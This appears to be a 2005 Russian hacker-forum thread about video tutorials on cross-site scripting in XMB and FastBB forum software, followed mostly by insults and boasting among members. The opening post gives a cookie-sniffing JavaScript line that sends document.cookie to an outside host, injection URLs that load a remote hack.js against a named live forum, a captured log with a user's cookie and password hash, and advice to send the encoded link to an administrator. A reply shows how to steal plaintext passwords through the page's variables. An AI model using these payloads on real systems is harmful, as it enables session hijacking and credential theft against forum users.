http://video.antichat.net/screens/XgluiR/xmbxss_resize.jpg

XSS в форумах XMB.
Дата добавления: 15:54 16.11.2005
Автор: XgluiR[[NO]]
Категория: Другое


Скачать: xmbxss.rar (http://video.antichat.net/videos/XgluiR/xmbxss.rar) [0.99 Мб]

http://video.antichat.net/screens/van/fastbbxss_resize.jpg

XSS в форумах FastBB.
Дата добавления: 15:51 16.11.2005
Автор: Ван[[NO]]
Категория: Другое


Скачать: fastbbxss.rar (http://video.antichat.net/videos/van/fastbbxss.rar) [0.56 Мб]

Выдрано из архива с видео
Привет я XgLuir

Сейчас я покажу XSS в форумах XMB

идем на форум а потом в отправку личных сообщений

http://www.karakelle.ru/forum/u2u.php?action=send - тут форма для отпраки!

Дыра находиться в форме для получателей из-за плохой фильтрации

Как видите пашет внедрим снифир :)

Для этого создадим js файл с кодом для сниффера

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

он у меня уже есть :)

http://www.fath.jino-net.ru/hack.js

Внедрим

REFERER=http://www.karakelle.ru/forum/u2u.php?action=send&username=<script>alert('xss')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>
QUERY=xmblva=1131740719; xmbuser=Зайка; xmbpw=202cb962ac59075b964b07152d234b70; xmblvb=1131737548
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)



Ну вот получили
xmbpw=202cb962ac59075b964b07152d234b70 - md5 hash

Но наверно появился вапрос а как у админы стырить ?

Отправляем админу сформированый линк он открывает и снифф записывает кукисы

http://www.karakelle.ru/forum/u2u.php?action=send&username=<script%20src=http://www.fath.jino-net.ru/hack.js></script>

Но лучше ссылку за кодировать :)

Вот и все

мда, извращение записывать видео, когда это мона описать в жва предложения.
Otaku спасибо.

На fastbb багу уже прикрыли.

На fastbb багу уже прикрыли.Баг сам нашел?? вроде wj че-та находил да?

Баг сам нашел?? вроде wj че-та находил да?
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.

Да, я взял багу которую выложил на форум wj, но она не работала-куки не подставлялись я просто капельку додумал-присылать переменные, во всем мне многие помогали, всем респект. Видео я сначала снимать и не думал, но потом подкинули идею-решил снять.
Насчёт сейчашней ситуации на fastbb-сейчас там что-то меняют, тег img не работает вообще. Обещают(посмотрел на a.fastbb.ru) что скоро закончат.

Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
Интересно, как понять эти и другие баги нашёл Задохлик? Что, все баги которые Я нашёл, Задохлик нашёл первый? или тебя понимать, что чтобы Я не находил, Задохлик уже это нашёл? Если да, то что? Это раз, два, Задохлик не показывает мне свою работу, по этому надежды что то скопировать у меня у него - нету как таковой.

Теперь, люди на форуме просили взломать фастбб потому что никто его не мог взломать. Если Задохлик, а кажись первым был не Задохлик а Джаз, ну так вот, если Джаз не захотел выложить коды для фастбб, или тот который нашёл, то это уже их проблемы. Я их выложил чисто чтобы похвастатся что Я Гений.


А вообще, Задохлик мало что понимает в ХSS, найти багу, с трудом может. Единственные люди на античате которые шарют в ХSS, так это White Jordan, Algol, zheleza, и zFailure которого терь нет. Задохлика эрия, это PHP including, так что не верю, что он мог в фастбб найти спаренные теги.

И на ответ, что же встётки нашёл Ван.

Он нашёл, что в поле var, пассворд не шифруется, а лежит в открытом виде и дописав "+pass+nick" в место "+document.cookie" (Без кавычек) то нам придёт значение этого атрибута, то есть в нашем случаи, пассворд и ник того человека, который попадается на сниффер. Вообще-то, на сниффер может прийти практически, всё что угодно.

Даю часть кода от фастбб.


<script language='JavaScript'>
var avr = new Array ('');
var zv = new Array ('admin','администратор');

var raz = new Array ();
var users = new Array ('whitejordan','');
var chknam = new Array ('whitejordan','');
var forum='whitejordan';
var filenumber='00000001';
var prof='whitejordan';
var adresat='1132430110';
var msgid='000';
var work='1';
var pass='123';
var nick='whitejordan';
var cls='';
var reklama='';
var modraz='';
var ip='69.25.60.210';
var razdel='0';
var lasttime='1132249495';
var noprintrazdel='';
var only_new_re=0;
var start_page_re=0;
var start=0;
var guest=0;
var count=4;
var leto=0;
var group=4;
var timezone=10800;
var type=2;
var form_new_off=0;
var form_re_off=0;
var avr_off=0;
var servertime=1132430115;
var rang=4;
var re_on_page=20;
var tem_on_page=20;
var gb=0;
var graf_but_off=0;
var gde_form=1;
var pod_otvet=1;
var gr_edit=1;
var gr_bui=0;
var gr_mat=0;
var gr_sm=0;
var gr_gif=0;
var gr_avr_send=1;
var protektion=1;
</script>

Любой var может прийти на сниффер.

Сейчас бесполезно перемалывать старое. Уязвимость fastbb нужна так, что важней уязвимостей на форумах в этой стране просто нет. Есть 4 форума которых быть не должно. Сейчас на fastbb фильтруются все таги, расшифровывается unicode. Несмотря на идиотичнейший движок вот так, в лоб, найти XSS более невозможно. Фильтр работает на все символы, а возможностей у форума.. Новый XSS на fastbb появится только с новыми возможностями (новыми багами). Молчание знающих товарищей в ответ на запросы подтверждает эти тезисы. Вероятно имеет смысл переходить на SQL-инъекции borda.ru. За те четыре форума я готов убить borda.ru, в принципе. Но мне нужны только эти четыре..

Я уже нашёл новые Xss, ты о чём? о_О

White Jordna, быстро твое мнение о людях меняется =D Ну ладно, думай как знаешь, я не буду писать что умеешь и не умеешь ты, т.к. каждому, кто в теме это и так уже понятно. И вообще меряться письками с кем-либо я не умею и не хочу.

Сейчас бесполезно перемалывать старое. Уязвимость fastbb нужна так, что важней уязвимостей на форумах в этой стране просто нет. Есть 4 форума которых быть не должно. Сейчас на fastbb фильтруются все таги, расшифровывается unicode. Несмотря на идиотичнейший движок вот так, в лоб, найти XSS более невозможно. Фильтр работает на все символы, а возможностей у форума.. Новый XSS на fastbb появится только с новыми возможностями (новыми багами). Молчание знающих товарищей в ответ на запросы подтверждает эти тезисы. Вероятно имеет смысл переходить на SQL-инъекции borda.ru. За те четыре форума я готов убить borda.ru, в принципе. Но мне нужны только эти четыре..

Гм, с выходом видео, исправление парсинга XSS на фастББ даже не затронуло моей (White Jordna, привет) XSS трехмесячной давности, так что хсс там остались и сейчас.

White Jordna, быстро твое мнение о людях меняется =D Ну ладно, думай как знаешь, я не буду писать что умеешь и не умеешь ты, т.к. каждому, кто в теме это и так уже понятно. И вообще меряться письками с кем-либо я не умею и не хочу.
У меня поменялось мнение о твоей знатности XSS, когда Я прочёл твои старые посты :D

А так, Я знаю по твоему видео, что ты шаришь по php including да и всё... :rolleyes:

Насчёт меня. Я просмотрел ВСЕ видео античата, и когда выходит новое видео, Я его опять смотрю. И к чему Я это? Да к тому, что Я умею всё. :rolleyes: Просто лучше всегдо, делаю атаки ХSS, так как это мне только и интересно. Баги php/including, SQL injection и т.д. они или есть, или их нет. Некоторые люди, могут их заставлять быть....как Я в XSS это прикраснно делаю. Баги XSS может и не быть, но Я заставлю чтобы она была и не важно на каком форуме или мыле! Вот такого уровня в других фазах не спорю, Я ещё не достиг. Но если бага уже найденна, или её легко найти, то провести атаку мне ничего не стоит.... :rolleyes:

Да Я и проводил и php including и SQL injection и многие другие разновидности атак, просто нашёл что к XSS у меня больше чем к другим, есть интерес. А вот такого уровня где человек заставляет XSS существовать когда её в памини нету и быть не может, вот такого уровня у тебя ещё нет. :rolleyes:

Ты можешь найти что то basic как и все, а более advanced, это уже не к тебе идти. :rolleyes:

Он нашёл, что в поле var, пассворд не шифруется, а лежит в открытом виде и дописав "+pass+nick" в место "+document.cookie" (Без кавычек) то нам придёт значение этого атрибута, то есть в нашем случаи, пассворд и ник того человека, который попадается на сниффер. Вообще-то, на сниффер может прийти практически, всё что угодно.
Ой,мляяяяяя ржууууунимагууууу
Джордан ты и вправду дурик и нихера нипонимаешь даже в javascript??????
"Он нашел" :)))))) ой бля...ну вот я сломал стул от безудержного смеха....бля :)))))))))))))))))))))))))))))) все пошел рассказывать всем "прикинь Ван открыл что можно передавать через js переменные!" %))))))))))))))))))))))))))))))))))))))))))))))))) ))))))
Помнится даже в какой-то похожей теме я писал толи Вану толи еще каму)))))))))))))))))))) кароче спасибо wj развеселил своем долбоебством и низнанием основ

Ой,мляяяяяя ржууууунимагууууу
Джордан ты и вправду дурик и нихера нипонимаешь даже в javascript??????
"Он нашел" :)))))) ой бля...ну вот я сломал стул от безудержного смеха....бля :)))))))))))))))))))))))))))))) все пошел рассказывать всем "прикинь Ван открыл что можно передавать через js переменные!" %))))))))))))))))))))))))))))))))))))))))))))))))) ))))))
Помнится даже в какой-то похожей теме я писал толи Вану толи еще каму)))))))))))))))))))) кароче спасибо wj развеселил своем долбоебством и низнанием основ
Ёбнулся чтоли? лооооооооооооол

Процитирую сам себя

Он нашёл, что в поле var, пассворд не шифруется,

....................


прикинь Ван открыл что можно передавать через js переменные!

Где Я сказал что Ван это "открыл" ? :confused:

Процитирую White Jordan'a :

"\x61 - это что за кодировка ?"

Когда-то когда мы с ним общались, мне долго пришлось объяснять ему что это такое, он так и не понял (т.к. потом опять назвал это кодировкой). Так что White Jordan, давай ты мне говорить ничего не будешь. Если что-то ко мне есть сказать - стучи в асю. Я конечно понимаю, что ты сам понимаешь что ты болен на голову и это ты так шутишь, но когда со мной шутят идиоты, которые понимают что они идиоты, и из-за этого думают что тот бред, который они говорят будет не обиден собеседнику, я злюсь, т.к. меня очень даже раздражает подобное обхождение со мной даже таких умственно немощных людей как ты.

Стой это не к тебе, щас Я тебе отвечу сек )



qBiN, это вот к тебе тогда получается,


Я обьяснил где он нашёл, что пассворд лежит в открытом виде и обьяснил, что он сделал и почему сработало. лоооооооооол ты и в прям ебнулся лоооооооооооол.

Конечно со стула так падать головой стукнутся можно. :rolleyes:

Так что мнение о том, что Вайт Джордан "разбирается" хотябы в XSS тоже ошибочно. Уж казалось в чем же здесь-то "разбираться"? Но Он не знает даже ни HTML ни JavaScript, так что о каком XSS из неоткуда может идти речь...

Так что мнение о том, что Вайт Джордан "разбирается" хотябы в XSS тоже ошибочно. Уж казалось в чем же здесь-то "разбираться"? Но Он не знает даже ни HTML ни JavaScript, так что о каком XSS из неоткуда может идти речь...
Всё, отыскал ссылку.

Ну так начнём. Когда ты мне про Хакер.ру дал статью, то Я со стула падал, когда ты обьяснял на целую страницу как использовать "/x3e" .......лоооооооооооол

http://forum.antichat.ru/showthread.php?p=12057#post12057

(Гость Это Я)


Ещё zFailure мне обьяснял в двух словах то, что тебе понадобилось обьяснять на целую страницу лооооооол

Это раз, потом, ты хоть пойми, что без кавычек и внутри атрибутов тега, эти символы работать не будут, а не потому не работают по твоему обьяснению, что браузер не понял лооооол уже даже не помню какую хрень ты мне ответил когда Я тебя спросил почему они на античате не работают. лооооооооол


Да и сам код ты от алгола скопировал....потом Я доооолго ржал хотя хе...не твоя эрия бывает. +)

Всё, отыскал ссылку.

Ну так начнём. Когда ты мне про Хакер.ру дал статью, то Я со стула падал, когда ты обьяснял на целую страницу как использовать "/x3e" .......лоооооооооооол

http://forum.antichat.ru/showthread.php?p=12057#post12057

(Гость Это Я)


Ещё zFailure мне обьяснял в двух словах то, что тебе понадобилось обьяснять на целую страницу лооооооол

Это раз, потом, ты хоть пойми, что без кавычек, эти символы работать не будут, а не потому не работают по твоему обьяснению, что браузер не понял лооооол уже даже не помню какую хрень ты мне ответил когда Я тебя спросил почему они на античате не работают. лооооооооол


Да и сам код ты от алгола скопировал....потом я доооолго ржал хотя хе...не твоя эрия бывает. +)
Ну по идеи такой бред должен вызывать улыбку =). Но т.к. кто-то воспринимает товарища всерьез у меня ее не возникает. Ладно, что-то я разошелся, больше отвечать на этот словесный понос не буду =)

Ну по идеи такой бред должен вызывать улыбку =). Но т.к. кто-то воспринимает товарища всерьез у меня ее не возникает. Ладно, что-то я разошелся, больше отвечать на этот словесный понос не буду =)
Я не говорю о системе а вообще стой лооооооооооол мх...

А хер да Я и сам не знаю Я просто леплю что мне в голову лезет лоооооооооооооол

Хер знает почему \ внутри атрибута тега, не работает без кавычек!!!! :D


Я именно говорю об обходах фильтров, а не о другой теме...хотя леплю всё что лезет на ум.

лооооооооооооооооооооол

Хотя по идеи..........не знаю...мх.мда уж........лоооооооол

даже ни HTML ни JavaScript, так что о каком XSS из неоткуда может идти речь...я о том же :)))))))))))
2wj если будешь придираться к словам я тоже начну:
Он нашёл, что в поле var, пассворд не шифруется, Оч трудно "найти" переменную в js??? и потом ты только что доказал что знания в js у тя нулевые "поле var" не существуют.Если бы ты знал js хотя бы самые основы, то наверное бы не написал такую лабуду("поле var") var насколько я помню объявление переменной,так как может быть правильным такое высказывание?? ("поле var") а и вот и ответ: никак!
Во вторых выше ты сам писал что-то типа var pass='123'; по твоему мнению получается что в "поле var" присваевается что то?)))))))))))))))))))
Кароче я уже убедился что ты нихера не знаешь.На ачате есть люди намного лучше ,отзывчевее,умнее тебя в любом плане с этим ты не поспоришь.
зы:слава богу голову не ударил так что все что тут написано впринципи пишу с трезвой головой =)

Девочки не сортесь